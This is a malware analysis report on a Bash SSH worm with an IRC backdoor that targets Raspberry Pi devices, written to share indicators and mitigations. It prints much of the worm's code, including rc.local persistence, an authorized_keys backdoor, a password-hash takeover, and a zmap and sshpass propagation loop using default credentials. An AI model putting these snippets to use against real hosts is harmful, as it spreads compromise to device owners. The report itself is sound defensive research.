highBotnet

Linux.IRCBot/RaspiWorm — Raspberry Pi SSH Worm with IRC C2

InvestigatedMarch 14, 2026PublishedMarch 14, 2026

botnetc2exploitiotapt

Classification: Backdoor + SSH Worm + IRC Botnet Analyst: GHOST / Breakglass Intelligence Date: 2026-03-14 Confidence: HIGH

Executive Summary

This sample is a self-propagating Bash shell script targeting Raspberry Pi devices running default credentials. Upon execution it establishes persistence via /etc/rc.local, installs an RSA-authenticated IRC backdoor on the UnderNet network (channel #biret), and uses zmap + sshpass to scan and infect new SSH-exposed Raspberry Pi hosts on the internet.

The malware is a close match to samples documented by Dr.Web as Linux.Siggen.2359 (also cross-tracked as "EnslavePi" and similar to Linux.MulDrop.14). The threat actor leverages the legitimate UnderNet IRC network as C2 infrastructure—making network-layer blocking difficult without impacting legitimate IRC users—and uses a 1024-bit RSA key pair to authenticate commands, preventing bot hijacking by rival operators.

What it does:

Kills competing IoT malware (Mirai variants, kaiten, miners, zmap)
Blocks competitor C2 domain bins.deutschland-zahlung.eu via /etc/hosts
Installs SSH backdoor key into /root/.ssh/authorized_keys
Changes pi user password to attacker-controlled hash
Deploys IRC bot connecting to 6 UnderNet servers, joining #biret
Propagates to new Raspberry Pi hosts via SSH (pi:raspberry, pi:raspberryraspberry993311)

Who is behind it: Unknown opportunistic threat actor; the C2 operator holds the RSA private key corresponding to the embedded 1024-bit public key. The use of UnderNet IRC suggests a low-budget operation. Infrastructure reuse and the hardcoded SSH backdoor key provide cross-campaign tracking capability.

Sample Metadata

Field	Value
SHA256	`0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f`
MD5	`53a00708025b192567c4ac2a28851686`
SHA1	`f36954f155d91423022d940701f59d948d0df2cb`
SSDEEP	`96:1RYZxQOBpLyxIcymLKY8M991wuIaQPYPW:1RJObLyxIIYMdwuwPYPW`
TLSH	`T1C5A1E750112C1AB17246697AD26FFA52B90EC81B0A7B7B358473A63C74F9DB8E0396C1`
File Type	Bash shell script (with binary magic header)
File Size	4,766 bytes
First Seen (VT)	2025-09-15 14:53:45 UTC
Last Scanned (VT)	2026-03-05 17:20:02 UTC
VT Detections	39/76 (51%)
VT Submissions	8 (4 unique sources)
Reporter	SamBurchmann
Filename	`0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f`

VT Detection Summary (Selected)

Engine	Detection Name
Microsoft	`Backdoor:Linux/IRCbot.YA!MTB`
Sophos	`SH/IRCBot-ANS`
Kaspersky	`HEUR:Backdoor.Linux.Agent.bc`
DrWeb	`Linux.Siggen.2359`
ESET-NOD32	`Linux/Agent.AGK trojan`
Symantec	`IRC.Backdoor.Trojan`
AhnLab-V3	`Backdoor/Shell.IRCbot.S1490`
Fortinet	`BASH/IRCBot.AU!tr`
F-Secure / Avira	`LINUX/CoinMiner.ABB`
TrendMicro	`Possible_IRCBOT.SMLBO`
Rising	`Backdoor.IRCbot/BASH!9.2A124`
Lionic	`Trojan.Script.IRCBot.m!c`
CAT-QuickHeal	`Script.shellBotnet.37854`

Static Analysis

File Header / Magic Bytes

The file begins with an anomalous header line before #!/bin/bash:

C0755 4745 EouDsLRq

Breaking this down:

C0755 — likely encodes Unix file permissions (0755 = rwxr-xr-x, C prefix possibly a version or type flag)
4745 — unknown field; may encode a checksum, size, or version identifier
EouDsLRq — Base64 decodes to \x12\x8b\x83\xb0\xb4j (6 bytes of binary; likely an embedded hash or nonce)

This metadata line is consistent with how some IoT worm variants tag propagated copies to track infection generations. It is not a Makeself marker.

Script Logic — Full Annotated Flow

Stage 1: Privilege Escalation

MYSELF=`realpath $0`
if [ "$EUID" -ne 0 ]; then
    NEWMYSELF=`mktemp -u 'XXXXXXXX'`
    sudo cp $MYSELF /opt/$NEWMYSELF
    sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
    sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
    sudo sh -c "echo 'exit 0' >> /etc/rc.local"
    sleep 1
    sudo reboot
fi

If not running as root, the script:

Copies itself to /opt/<random-name> via sudo
Overwrites /etc/rc.local to execute itself on every boot
Reboots — next boot runs as root

Stage 2: Competitor Elimination

killall bins.sh minerd node nodejs
killall ktx-armv4l ktx-i586 ktx-m68k ktx-mips ktx-mipsel ktx-powerpc ktx-sh4 ktx-sparc
killall arm5 zmap kaiten perl

Killed processes indicate awareness of the IoT malware ecosystem:

minerd — CPU cryptocurrency miner
ktx-* — Mirai variant binaries (multiple CPU architectures)
kaiten — Classic IRC bot (Kaiten/Tsunami DDoS tool)
zmap — Internet scanner (used by competing worms)
bins.sh — Likely a Mirai loader/dropper script

Stage 3: Competitor C2 Blocking

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts

Routes competitor's binary distribution server to localhost, preventing victim from receiving competitor malware or updates. The domain bins.deutschland-zahlung.eu currently does not resolve (SERVFAIL) — suggests the competitor was already disrupted or abandoned their infrastructure.

Stage 4: Credential Takeover

rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p '$6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1' pi

Deletes .bashrc for root and pi (removes any previous backdoors or forensic artifacts placed there)
Changes pi user's password to a SHA-512 crypt hash controlled by the attacker
This allows the worm to propagate using pi:<new_password> in future hops (second credential: raspberryraspberry993311)

Stage 5: SSH Backdoor Installation

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN..." >> /root/.ssh/authorized_keys

SSH Backdoor Key:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1I
dE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR0
2c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22w
EGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCV
jBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B

Fingerprint: SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q (2048-bit RSA)

The attacker can SSH directly to any infected host as root, independent of the IRC bot.

Stage 6: Environment Setup

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx* /tmp/cpuminer-multi /var/tmp/kaiten

Adds Google DNS to ensure reliable resolution (target systems may have misconfigured DNS). Removes competitor malware artifacts from temp directories.

Stage 7: RSA Command Signing Key Deployment

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

RSA C2 Signing Key Details:

Algorithm: RSA 1024-bit
Exponent: 65537
Used to authenticate commands received over IRC: the operator signs command hashes with the corresponding private key; bots verify with this public key before executing

This prevents rival IRC users from issuing commands to the botnet (bot hijacking protection).

Stage 8: IRC Bot Deployment (Embedded Script)

An inline Bash script is written to /tmp/<XXXXXXXX>, made executable, and launched with nohup:

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}   # Nickname derived from system fingerprint (chars 24-32 of MD5)

Bot nickname is deterministically derived from the victim's uname -a output, providing a unique per-host identifier while being hard to predict externally.

C2 Protocol:

Connects to one of 6 UnderNet IRC servers on port 6667 (chosen randomly)
Sets NICK, sends USER user 8 * :IRC hi
Responds to PING with PONG (keepalive)
On first PING, joins channel #biret
Waits for PRIVMSG messages containing two Base64 fields:
- Field 3 (: delimited): RSA signature of command hash
- Field 4: Base64-encoded command
Verifies: base64_decode(signature) == openssl rsautl -verify(command_MD5)
If valid, executes command via bash -c and returns output Base64-encoded to sender

C2 Server List:

ix1.undernet.org       (port 6667)
ix2.undernet.org       (port 6667)
Ashburn.Va.Us.UnderNet.org   (port 6667)
Bucharest.RO.EU.Undernet.Org (port 6667)
Budapest.HU.EU.UnderNet.org  (port 6667)
Chicago.IL.US.Undernet.org   (port 6667)

After launching the bot, the script deletes the bot file from disk (rm -rf /tmp/$BOT) and deletes nohup.out. The bot process continues running but has no on-disk artifact.

Stage 9: Self-Propagation Engine

apt-get install zmap sshpass -y --force-yes

while [ true ]; do
    FILE=`mktemp`
    zmap -p 22 -o $FILE -n 100000      # Scan 100,000 random hosts for port 22
    killall ssh scp
    for IP in `cat $FILE`; do
        sshpass -praspberry scp ... $MYSELF pi@$IP:/tmp/$NAME  && \
            sshpass -praspberry ssh pi@$IP ... "chmod +x $NAME && bash -c ./$NAME" &
        sshpass -praspberryraspberry993311 scp ... $MYSELF pi@$IP:/tmp/$NAME  && \
            sshpass -praspberryraspberry993311 ssh pi@$IP ... "chmod +x $NAME && bash -c ./$NAME" &
    done
    rm -rf $FILE
    sleep 10
done

For every scan cycle:

Scans 100,000 random internet hosts for open SSH (port 22)
Attempts scp + ssh execution with two credentials:
- pi:raspberry (default Raspberry Pi OS password)
- pi:raspberryraspberry993311 (previously-infected host password)
Successful infections logged to /opt/.r
Runs in infinite loop with 10-second sleep between cycles

Infection Chain / Kill Chain

[Internet-Exposed Raspberry Pi with default creds]
          │
          ▼ (SSH, pi:raspberry or pi:raspberryraspberry993311)
[Initial Access — T1078.001]
          │
          ▼ (sudo cp + /etc/rc.local modification)
[Persistence — T1037.004]
          │
          ▼ (sudo reboot → runs as root)
[Privilege Escalation — T1548.003]
          │
          ├──► [Kill competitors — T1562.001]
          ├──► [Block competitor C2 in /etc/hosts — T1562.006]
          ├──► [Change pi password — T1098]
          ├──► [Install SSH backdoor key — T1098.004]
          ├──► [Set DNS to 8.8.8.8 — T1490]
          │
          ▼ (write RSA pubkey, deploy IRC bot script)
[Command & Control — T1071 / IRC over port 6667]
          │   UnderNet #biret channel
          │   Operator sends RSA-signed Base64 commands
          │   Bot executes and returns output
          │
          ▼ (apt-get install zmap sshpass; zmap -p 22 -n 100000)
[Network Scan — T1046]
          │
          ▼ (sshpass SCP + SSH execution loop)
[Lateral Movement / Propagation — T1021.004]
          │
          └──► [New Raspberry Pi Victim] ──► (repeat)

Behavioral Analysis (Inferred from Static + OSINT)

Post-Compromise Capabilities (via IRC C2)

Since the IRC bot executes arbitrary RSA-signed bash commands and returns output, the operator has full remote code execution on all bots. Inferred capabilities based on the bot infrastructure and competing malware killed:

DDoS execution: Kaiten (killed competitor) is a DDoS tool; this bot likely supports DDoS attacks on demand
Cryptomining: minerd is killed as a competitor; operator could deploy their own miner
Credential harvesting: Shell access allows reading /etc/shadow, SSH keys, etc.
Proxy/relay: Bots can serve as SOCKS proxies for further attacks
Download and execute: Any binary can be fetched and run via the IRC command channel

Target Profile

Raspberry Pi devices (explicit targeting of pi user and Raspberry Pi default password)
Any ARM/x86 Linux host with SSH exposed and default credentials
Estimated victim pool: Any of the millions of Raspberry Pi devices with SSH internet-exposed

Network Indicators — C2 Infrastructure

IRC C2 — UnderNet Network

The malware uses the legitimate public UnderNet IRC network as C2. It does NOT operate private infrastructure — all IRC servers contacted are real UnderNet network nodes. This makes IP-based blocking impractical without also blocking legitimate UnderNet users.

Server FQDN	Resolved IPs	ASN	Provider	Country	IRC Ports
ix1.undernet.org	194.68.45.100	AS31800	DALnet	Sweden (Solna)	6667, 6668
ix2.undernet.org	45.58.183.18	AS46844	Sharktech	Netherlands (Amsterdam)	6667, 6662
Ashburn.Va.Us.UnderNet.org	186.233.185.155, 172.83.156.122, 104.152.54.52, 199.71.214.87	—	Various	USA	6661–6668, 7000
Bucharest.RO.EU.Undernet.Org	94.125.182.255, 185.117.74.172, 185.243.218.59	—	Various	EU	6661–6668
Budapest.HU.EU.UnderNet.org	94.125.182.255	—	—	Hungary	6666–6668
Chicago.IL.US.Undernet.org	104.152.54.52	—	—	USA	6661–6668, 7000

IRC Channel: #biret Protocol: IRC over TCP/6667 (plain, no TLS) C2 Method: RSA-signed PRIVMSG commands in Base64

Shodan Intelligence on Key IRC IPs

IP	Hostname	Org	Ports Confirmed
194.68.45.100	—	DALnet unrouted servers	6667, 6668
45.58.183.18	customer.sharktech.net	Sharktech Inc.	6667, 6662
94.125.182.255	ircu.atw.hu	—	6666, 6667, 6668
185.117.74.172	ircu2.hostsailor.com	—	6661, 6666, 6667, 6668
185.243.218.59	—	—	6661, 6662, 6666–6668, 7000
104.152.54.52	—	—	6661, 6662, 6666–6668, 7000
199.71.214.87	undernet.psychz.net	—	6661, 6662, 6666–6668, 7000

All IPs confirmed running cpe:/a:undernet:ircu (UnderNet IRC daemon).

Competitor C2 Domain

Domain	Status	Notes
`bins.deutschland-zahlung.eu`	NXDOMAIN / SERVFAIL	Competitor binary distribution server; nullrouted by malware via `/etc/hosts`; registrar: TLD Registrar Solutions Ltd

MITRE ATT&CK TTPs

Technique ID	Name	Implementation
T1078.001	Valid Accounts: Default Accounts	Exploits `pi:raspberry` default Raspberry Pi credential
T1021.004	Remote Services: SSH	Propagates via SSH using sshpass
T1037.004	Boot or Logon Initialization Scripts: RC Scripts	Writes `/etc/rc.local` for persistence across reboots
T1098	Account Manipulation	Changes `pi` user password hash
T1098.004	Account Manipulation: SSH Authorized Keys	Adds attacker RSA key to `/root/.ssh/authorized_keys`
T1059.004	Command and Scripting Interpreter: Unix Shell	All functionality implemented in Bash
T1046	Network Service Scanning	Uses `zmap` to scan 100,000 hosts/cycle for open SSH (port 22)
T1018	Remote System Discovery	`zmap` output provides list of SSH-reachable hosts
T1071	Application Layer Protocol	Uses IRC over TCP/6667 as C2 channel
T1562.001	Impair Defenses: Disable or Modify Tools	Kills 16 competing malware processes
T1562.006	Impair Defenses: Indicator Blocking on Host	Nullroutes competitor C2 in `/etc/hosts`
T1070.004	Indicator Removal: File Deletion	Deletes bot script from disk after launch; removes `nohup.out`
T1105	Ingress Tool Transfer	SCP copies worm script to new victims
T1587.003	Develop Capabilities: Digital Certificates	RSA key pair for C2 command authentication
T1136	Create Account (via password change)	Effectively takes ownership of `pi` account

IOCs

File Hashes

Type	Hash
SHA256	`0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f`
MD5	`53a00708025b192567c4ac2a28851686`
SHA1	`f36954f155d91423022d940701f59d948d0df2cb`
SSDEEP	`96:1RYZxQOBpLyxIcymLKY8M991wuIaQPYPW:1RJObLyxIIYMdwuwPYPW`

Network Indicators

Type	Value	Notes
Domain	`bins.deutschland-zahlung.eu`	Competitor C2 (blocked by malware)
IP	`194.68.45.100`	UnderNet ix1, AS31800, Sweden
IP	`45.58.183.18`	UnderNet ix2, AS46844, Netherlands
IP	`94.125.182.255`	UnderNet EU/Budapest
IP	`185.117.74.172`	UnderNet EU/Bucharest
IP	`185.243.218.59`	UnderNet EU
IP	`104.152.54.52`	UnderNet US/Chicago/Ashburn
IP	`199.71.214.87`	UnderNet US/Ashburn
IP	`186.233.185.155`	UnderNet US
IP	`172.83.156.122`	UnderNet US
Port	TCP/6667	IRC C2 communication
IRC Channel	`#biret`	C2 command channel on UnderNet
DNS	`8.8.8.8`	Added to /etc/resolv.conf

Host-Based Indicators

Type	Value	Notes
File Path	`/opt/<XXXXXXXX>`	Worm copy (random 8-char name)
File Path	`/etc/rc.local`	Modified for boot persistence
File Path	`/root/.ssh/authorized_keys`	Backdoor SSH key appended
File Path	`/tmp/public.pem`	C2 RSA signing key (deleted after bot launch)
File Path	`/tmp/bot.log`	IRC bot stdout
File Path	`/opt/.r`	Log of successfully infected IPs
File Path	`/tmp/.s`	Timestamp file (date marker)
Process	`zmap -p 22`	Port scan for propagation
Process	`sshpass -praspberry`	SSH propagation
Process	`sshpass -praspberryraspberry993311`	SSH propagation
SSH Key	`SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q`	2048-bit RSA backdoor key
Password	`raspberry`	Raspberry Pi default (targeted)
Password	`raspberryraspberry993311`	Previously-infected host password (targeted)
Password Hash	`$6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/...CYDeR1`	SHA-512 hash set on `pi` account

Cryptographic Keys

SSH Backdoor Public Key (RSA 2048-bit):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1I
dE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR0
2c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22w
EGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCV
jBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B

Fingerprint: SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q

C2 Command Signing Key (RSA 1024-bit public key):

Modulus: 00:bf:8a:14:de:d8:32:e6:1b:d8:6e:06:2f:43:b0:22:7d:d0:c2:6c:82:5b:fb:...

Campaign Context

Timeline

Date	Event
2017	Linux.MulDrop.14 first documented by Dr.Web (predecessor campaign, same targeting)
2017–2018	"EnslavePi" wave — same IRC channel (#biret), same SSH key observed across samples
2025-09-15	This sample first submitted to VirusTotal (4 unique sources)
2026-03-05	Last VT scan
2026-03-14	Submitted to Breakglass Intelligence / this analysis

The killall targets reveal a picture of the competing IoT malware landscape this bot operates within:

Killed Process	Associated Malware Family
`kaiten`	Kaiten/Tsunami IRC DDoS bot
`minerd`	cpuminer-multi (cryptocurrency miner)
`ktx-armv4l/i586/m68k/mips/mipsel/powerpc/sh4/sparc`	Multi-arch Mirai variant binaries
`arm5`	ARM-targeted IoT bot
`zmap`	Internet scanner (used by Masscan/ZMap worms)
`bins.sh`	Mirai-derived loader script
`node`/`nodejs`	Possibly Node.js-based bots

The blocking of bins.deutschland-zahlung.eu is significant — this domain was previously associated with a competing Mirai-based malware distribution operation. Its current SERVFAIL status suggests that campaign infrastructure has been torn down.

Attribution

Attribute	Assessment
Threat Actor	Unknown opportunistic actor; likely IoT botnet operator
Malware Family	Linux.IRCBot / EnslavePi variant (Dr.Web: Linux.Siggen.2359)
Operation Type	IoT botnet for DDoS/proxy/mining-as-a-service
Sophistication	Low-Medium — Bash-only, no binary exploitation, but uses RSA for C2 auth
Attribution Confidence	LOW (actor identity unknown)
Infrastructure Confidence	HIGH (all C2 infrastructure positively identified)

OPSEC Mistakes

The threat actor made several significant operational security errors that provide attribution and tracking capability:

Hardcoded RSA signing key: The embedded 1024-bit RSA public key uniquely fingerprints the operator — the operator holds the only private key that can issue valid commands to this botnet. Any new samples using the same public key are from the same operator.
Hardcoded SSH backdoor key: The 2048-bit RSA SSH public key (SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q) persists across campaign variants. This key can be used to cluster related samples and track infrastructure evolution.
Plaintext IRC on public network: The entire C2 channel #biret on UnderNet is publicly joinable. Any researcher can join #biret on UnderNet and observe command traffic (though commands are signed, victim nicknames and system fingerprints are visible).
Bot nickname derivation is traceable: Bot nicknames = a + chars 24–32 of md5(uname -a). This is deterministic per host — analysts can correlate nicks to specific compromised systems.
Hardcoded propagation credentials in cleartext: Both raspberry and raspberryraspberry993311 are embedded in plaintext.
Infection log left on disk: /opt/.r is a plaintext log of all successfully infected IPs — left readable on every infected host.

Infrastructure Map

ATTACKER (holds RSA-1024 private key + SSH-2048 private key)
    │
    │  RSA-signed commands (Base64/IRC PRIVMSG)
    ▼
[UnderNet IRC Network — Channel #biret]
    │   Servers randomly selected from pool of 6
    │
    ├── ix1.undernet.org:6667 (194.68.45.100) — Sweden/AS31800
    ├── ix2.undernet.org:6667 (45.58.183.18) — NL/AS46844/Sharktech
    ├── Ashburn.Va.Us.UnderNet.org:6667 → 4 US IPs
    ├── Bucharest.RO.EU.Undernet.Org:6667 → 3 EU IPs
    ├── Budapest.HU.EU.UnderNet.org:6667 (94.125.182.255)
    └── Chicago.IL.US.Undernet.org:6667 (104.152.54.52)
            │
            │  IRC PRIVMSG (RSA-verified commands → bash exec → Base64 response)
            ▼
    [Infected Raspberry Pi Bots — nick: a<hex8>]
            │
            │  SSH (pi:raspberry | pi:raspberryraspberry993311)
            │  zmap -p 22 -n 100000
            ▼
    [New Raspberry Pi Victims — worldwide]
            │
            └── [Direct SSH root access for attacker]
                  (SSH key SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q)

Recommended Mitigations

Change default Raspberry Pi credentials immediately — do not use pi:raspberry
Disable SSH password authentication — use key-based auth only
Block outbound IRC (TCP/6660-6669, 7000) at network perimeter
Monitor for zmap process execution — strong indicator of compromised host
Monitor /etc/rc.local modification — persistence mechanism
Monitor /root/.ssh/authorized_keys for unauthorized keys
Check for /opt/.r file — infection log written to every compromised host
Search authorized_keys for fingerprint SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q
Block bins.deutschland-zahlung.eu at DNS (competitor C2 already down but may return)